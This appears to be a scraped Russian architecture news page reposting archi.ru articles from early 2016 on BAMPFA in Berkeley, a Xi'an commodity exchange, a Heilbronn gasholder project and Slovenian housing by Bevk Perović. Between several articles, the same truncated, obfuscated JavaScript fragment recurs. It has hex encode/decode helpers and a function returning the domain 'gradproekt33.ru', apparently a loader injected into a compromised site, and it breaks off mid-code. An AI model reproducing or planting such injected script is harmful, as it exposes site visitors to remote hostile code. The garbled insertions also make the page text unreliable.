Новости


09.03.2016 Стальная драпировка

Здание Музея искусств Беркли и Тихоокеанского киноархива по проекту Diller Scofidio + Renfro.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Новое здание принадлежащих Калифорнийскому университету учреждений расположено на границе его кампуса и городских кварталов и призвано служить и студентам, и жителям Беркли. Его основа – вузовская типография, построенная в 1939 в русле ар деко; именно там в 1945 был напечатан Устав ООН. Самая эффектная деталь этой индустриальной постройки – гребенка из шедовых фонарей на крыше. Теперь в здании располагаются восемь выставочных залов, малый кинозал (33 места), арт-лаборатория.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Новая часть сооружения – обшитый листами нержавеющей стали «шифр» (так назвали его архитекторы): он выглядит, как металлическая драпировка, наброшенная на прямоугольные корпуса типографии. Там расположены кинозал (232 места), синематека, учебные помещения и кафе. С одной стороны «шифр» завершается огромным LED-экраном, с другой – консольным выносом кафе, сквозь остекление которого виден ярко-красный интерьер.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Семь сосен канарских, которые росли на участке до строительства, были использованы для изготовления деревянных деталей интерьера; в качестве компенсации были посажены 23 дерева.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Бюджет постройки составил 112 млн долларов: средства были пожертвованы благотворителями или поступили из иных частных источников.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

В собрании Музея Беркли – неолитическая керамика с территории Китая, графика старых мастеров, произведения современного и новейшего искусства. Тихоокеанский киноархив владеет крупнейшим собранием японских фильмов за пределами Японии, обширной коллекцией советского кино, созданных на Западном побережье США авангардных лент, видео-арта.

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA)

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Iwan Baan. Предоставлено Diller Scofidio + Renfro; EHDD; UC Berkeley Art Museum and Pacific Film Archive (BAMPFA) открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA. Фото: Elizabeth Daniels. Предоставлено Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro

Музей искусств Беркли и Тихоокеанский киноархив – BAMPFA © Diller Scofidio + Renfro открыть большое изображение

Источник: www.archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
05.03.2016 Семь самураев

Японские бюро Interdesign Associates и Hugo Kohno Architect Associates возвели в китайском Сиане Центр товарных бирж Среднего Запада.

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Административный центр провинции Шэньси в северо-западной части КНР должен стать отправной точкой так называемого Нового Шелкового пути – амбициозного проекта, призванного сформировать инфраструктуру для прочных торговых связей в условиях современного мира. Частью этого плана стало создание на окраине Сианя Международного торгово-логистического комплекса. Именно на его территории и возник Midwest Commodity Exchange Center (MCEC).

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Комплекс построек общей площадью 326 200 м2 довольно сложно организован: он состоит из семи башен, причем каждая имеет свое решение и символическое значение. Вдоль границ участка расположены башни A, С, D и E, которые архитекторы называют «мостами». Они соединены по две и ориентированы по сторонам света, символизируя торговые связи между Севером и Югом, Западом и Востоком. На противоположном углу участка находятся две шестигранные колонноподобные башни F и G, которые выполняют роль «ворот». И, наконец, между башнями A и C возникает еще один, самый главный объем. Сложная, расширяющаяся кверху, форма башни B навеяна одним из национальных достояний Японии: так называемой «золотой печатью вана страны На», созданной в Китае в 1 веке нашей эры. Подобные печати – инканы – традиционно использовались в качестве личной подписи при заключении важных сделок и договоров.

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Все вместе башни образуют очень сложный, но тщательно просчитанный и весьма динамичный силуэт. Поскольку деятельность расположенных в MCEC компаний связана с торговлей металлами, стеклянные панели фасадов имеют пропорции золотого сечения (башня-«печать»), платинового сечения (башни-«мосты») и бронзового сечения (башни-«ворота»). Панели установлены под разными углами, так что фасады боковых корпусов отражают узор в виде сотообразной золотой сетки, которой окутан центральный объем. Дополнительный комфорт внутренних зон обеспечивает нанесенный на стекло специальный рисунок и жалюзи. Так же на фасадах установлена динамическая светодиодная подсветка и в вечернее время весь комплекс превращается в настоящий аттракцион.

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Корпуса MCEC включают все необходимые для функционирования компаний зоны. Верхние части зданий занимают собственно рабочие помещения, а в нижних сосредоточены специфические профильные, общественные и коммуникационные зоны. Разработкой интерьеров занималось китайское бюро Hallucinate Design Office.

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office

Центр товарных бирж Среднего Запада в Сиане © Javier Callejas Sevilla, сourtesy of Hallucinate Design Office открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates

Центр товарных бирж Среднего Запада в Сиане © Interdesign Associates открыть большое изображение

Источник: www.archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
02.03.2016 Шар над зеленой крышей

Проект превращения газгольдера в Хайльбронне на западе Германии в учебно-исследовательский центр, разработанный Дмитрием Бойковым и его бюро db-arch studio.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
Проект был создан по заказу инвесторов, Bechtle AG и KACO new energy, желавших превратить промзону в центре города в продолжение расположенного рядом кампуса Хайльброннского университета (HHN – Hochschule Heilbronn).
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber открыть большое изображение
Газгольдер в Хайльбронне © Дмитрий Бойков
Газгольдер в Хайльбронне © Дмитрий Бойков открыть большое изображение
Реконструированный шар газгольдера был призван стать главной достопримечательностью вузовского городка. На общей площади в 9 000 м2 были запланированы центр инноваций, студенческая столовая, кафе и рестораны, библиотека, учебные аудитории и исследовательские лаборатории. Объединение в новом здании стольких функций обуславливалось не только дефицитом пространств для досуга студентов, но и нехваткой в HHN аудиторий, лабораторий, столовых и кафе.
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
Непосредственно в самой сфере размещались залы музея технологий, аудитории, 3D-кинотеатр. Зеленая ступенчатая крыша изгибалась вокруг шара, образуя гигантский амфитеатр, а на поверхность газгольдера предполагалось проецировать видео: в результате, кровля постройки должна была стать медиа-центром под открытым небом, причем не только для студентов, но и для всех жителей Хайльбронна. Крыша и площадь между газгольдером и вузом могли использоваться для крупных городских общественных мероприятий. Качественная зеленая зона с водоемами и фонтанами, цветниками и деревьями на площади должна была стать «визитной карточкой» привлекающего инвестиции активно развивающегося образовательного «сегмента» города.
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
На внешней оболочке шара предполагалось установить солнечные коллекторы, использовать в проекте новейшие технологии одного из инвесторов – лидера инноваций в области возобновляемой энергии.
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Проект, 2011-2013 © db-arch studio открыть большое изображение
Этот проект Дмитрия Бойкова, работающего в Германии российского архитектора, созданный при участии немецкого инженера Бориса Петера (бюро Knippers Helbig Advanced Engineering), получил несколько отечественных наград, в частности, Серебряный диплом Национального рейтинга «Золотая капитель 2014», премию «Серебряный знак» и диплом САР «За развитие идей эко-устойчивой архитектуры» Международного фестиваля «Зодчество 2013», Серебряный диплом «Евразийской премии 2012».
Учебно-исследовательский центр «Газгольдер». Интерьер 1 этажа. Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Интерьер 1 этажа. Проект, 2011-2013 © db-arch studio открыть большое изображение
Проект не был воплощен: заказчикам не удалось привлечь необходимые для его реализации дополнительные инвестиции, и участок вместе с газгольдером был продан фонду Dieter Schwarz Stiftung, дополнившему его соседним куском земли. В результате, шар-газгольдер, интересный памятник индустриальной архитектуры (сооружен в 1964) был снесен, а на его месте появилсякрупный комплекс лабораторий и офисов по проекту Auer Weber.
Учебно-исследовательский центр «Газгольдер». Генеральный план. Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Генеральный план. Проект, 2011-2013 © db-arch studio открыть большое изображение
Учебно-исследовательский центр «Газгольдер». Южный фасад. Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Южный фасад. Проект, 2011-2013 © db-arch studio открыть большое изображение
Учебно-исследовательский центр «Газгольдер». Планы 1, 2, 3 этажей. Проект, 2011-2013 © db-arch studio
Учебно-исследовательский центр «Газгольдер». Планы 1, 2, 3 этажей. Проект, 2011-2013 © db-arch studio открыть большое изображение
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber открыть большое изображение
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber
Газгольдер в Хайльбронне. Фото предоставлено Auer Weber открыть большое изображение
Источник: www.archi.ru
 
28.02.2016 Хороший вкус Словении

О трех проектах бюро Bevk Perović: башне с офисами и квартирами и студенческом общежитии в Любляне и комплексе социального жилья в городе Крань.

Несмотря на некоторое предубеждение, иногда возникающее в воздухе при обсуждении современной архитектуры стран бывшего соцлагеря, все более очевидным становится то, что она отличается интересными решениями и высоким качеством реализации. Приезжая в Словению, не ожидаешь увидеть такое количество прекрасных новых зданий, выполненных часто из «бюджетных» материалов, но с большим вкусом. Складывается впечатление, что архитекторам, заказчикам, властям города, жителям – всем здесь не все равно, в какой среде жить. Как бы высокопарно это ни прозвучало, но здесь чувствуется стремление к развитию во всем.

Из ныне работающих словенских архитекторов всем хорошо известно бюро Ofis, так что о них в этот раз мы говорить не будем, а рассмотрим три работы еще одной талантливой мастерской – Bevk Perović Arhitekti, возглавляемой уроженцем Любляны Матией Бевком и Васой Перовичем из Белграда.




Башня

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Когда участок проектирования жилого комплекса располагается в непосредственной близости от железной дороги, а цена квадратного метра, задуманная девелоперами, считается по словенским меркам высокой, то здание должно обладать рядом качеств, сглаживающих недостатки ситуации и оправдывающих немалую стоимость жилья. То, что получилось у архитекторов Bevk Perović – очень хороший результат.

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Многофункциональный комплекс Situla включает в себя торговые площади, офисные пространства, подземный гараж в 5 уровней и 226 квартир различной типологии: от однокомнатных до дуплексов и апартаментов с патио, подражающих планировке средиземноморского жилища. Стоимость квартир растет в зависимости от этажа, что логично, ведь сверху железная дорога становится почти незаметной, а вид на старый город – более выигрышным. Как в большинстве домов башенного типа, квартиры здесь получились глубокими. В таком случае сделать действительно удачную планировку бывает непросто, но архитекторам в этом проекте это, в основном, удалось, хотя в некоторых случаях, например, отведенная коридорам площадь кажется чрезмерной.

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

В Situla применен принцип «двойного фасада»: внутренний состоит из сплошного остекления с звукоизоляцией, а внешний – из перфорированных алюминиевых сдвижных панелей, при помощи которых, по задумке архитекторов, можно регулировать уровень открытости интерьера окружающей среде. Такие панели стоят недешево, но с эстетической и практической точек зрения они очень хороши. Вообще, не может не радовать то, что, несмотря на немалую стоимость некоторых использованных материалов, заказчики согласились с их применением. Отдельно нужно отметить очень высокое качество реализации проекта.

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

В комплексе есть все необходимое для повседневной жизни; по большому счету, из него можно вообще не выходить: здесь расположены магазины – от продуктовых до цветочных, фитнес-центр, и имеется консьерж, услугами которого можно воспользоваться 24 часа.

Комплекс жилья и офисов Situla © Miran Kambič

Комплекс жилья и офисов Situla © Miran Kambič открыть большое изображение

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение

Situla вызывает легкую зависть от того, что все участники процесса сделали свою работу качественно, со вкусом и мастерством, и очевидно нацелены на высокие результаты. И то, что для Словении это не исключение, а тенденция, демонстрируют другие работы Bevk Perović.

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti

Комплекс жилья и офисов Situla © Bevk Perović Arhitekti открыть большое изображение




Общежитие

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Как сделать жилье для студентов как можно более комфортным и интересным – тема постоянных дискуссий и конкурсов в Европе. В Любляне, на границе центра города и близ реки расположен «дом для студентов», который как раз можно использовать как образец для подобных проектов.

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

От дороги общежитие на 56 комнат отгорожено рядами деревьев. Оно отличается простотой и функциональностью решений: здесь есть общественный первый уровень с пространствами для учебы, отдыха и пр., и два жилых этажа. Комнаты для студентов организованы очень просто: по две по сторонам от общего санузла и кухни-столовой. У всех комнат есть балконы, где имеется кладовка.

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Студенческое общежитие в районе Поляне © Елизавета Клепанова

Студенческое общежитие в районе Поляне © Елизавета Клепанова открыть большое изображение

На фасаде использованы перфорированные складные элементы, напоминающие решение Situla: благодаря им можно регулировать «приватность» помещений: даже в закрытом состоянии через отверстия в панелях прекрасно видна улица, а вот снаружи не видно ничего. Большим плюсом является остекление части бокового фасада, благодаря чему все лестницы получили дневное освещение.

Студенческое общежитие в районе Поляне © Елизавета Клепанова

Студенческое общежитие в районе Поляне © Елизавета Клепанова открыть большое изображение

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Отдельно хочется упомянуть благоустройство внутреннего двора, выполненного также очень просто, но изящно, в сочетании нескольких разных фактур материалов.

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Студенческое общежитие в районе Поляне © Miran Kambič

Студенческое общежитие в районе Поляне © Miran Kambič открыть большое изображение

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti открыть большое изображение

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti открыть большое изображение

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti открыть большое изображение

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti открыть большое изображение

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti

Студенческое общежитие в районе Поляне © Bevk Perović Arhitekti открыть большое изображение



Доступное жилье

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Социальный жилой комплекс Sotočje со стороны больше похож на жилье для состоятельных людей. Он расположен в городе Крань с видом на место слияния рек Сава и Кокра. Здесь еще в XIX веке была промышленная зона, причем непосредственно перед началом строительства – каучуковый завод, и из-за этого экологическая ситуация на участке была не лучшей. Поэтому, кроме предпринятых до начала строительства мер по очистке почвы, проект включает в себя платформу, служащую не только гаражом, но и барьером от загрязнения.

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Комплекс состоит из трех корпусов: архитекторы постарались поставить их так, чтобы большинство из 142 квартир получило вид на реку. Сами квартиры достаточно скромны по размерам и просты по планировке.

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Все корпуса опоясаны балконами, а их оболочка вновь выполнена из перфорированных панелей, орнамент которых имитирует деревянные конструкции характерных для этой местности исторических зданий. Отдельного упоминания заслуживают шторы из брезента – не только прочные, но и очень стильные.

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Благоустройство двора, как и в случае со студенческим общежитием, сочетает очень приятные текстуры и фактуры и отличается простотой, комфортом и изяществом решения.

Комплекс социального жилья Sotočje © Miran Kambič

Комплекс социального жилья Sotočje © Miran Kambič открыть большое изображение

Комплекс социального жилья Sotočje © Елизавета Клепанова

Комплекс социального жилья Sotočje © Елизавета Клепанова открыть большое изображение

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti открыть большое изображение

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti открыть большое изображение

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti открыть большое изображение

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti

Комплекс социального жилья Sotočje © Bevk Perović Arhitekti открыть большое изображение


***

Современную архитектуру Словении хочется изучать детально: в ней много интересных подробностей, которые с помощью текстов и фотографий пришлось бы фиксировать долго и скрупулезно. Лучше приехать и посмотреть на все самим: здесь есть, чему поучиться – не только в творческом плане, но и в аспекте подхода к реализации.
Источник: www.archi.ru

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
24.02.2016 Хироки Мацура: «Город и здание неотделимы друг от друга»

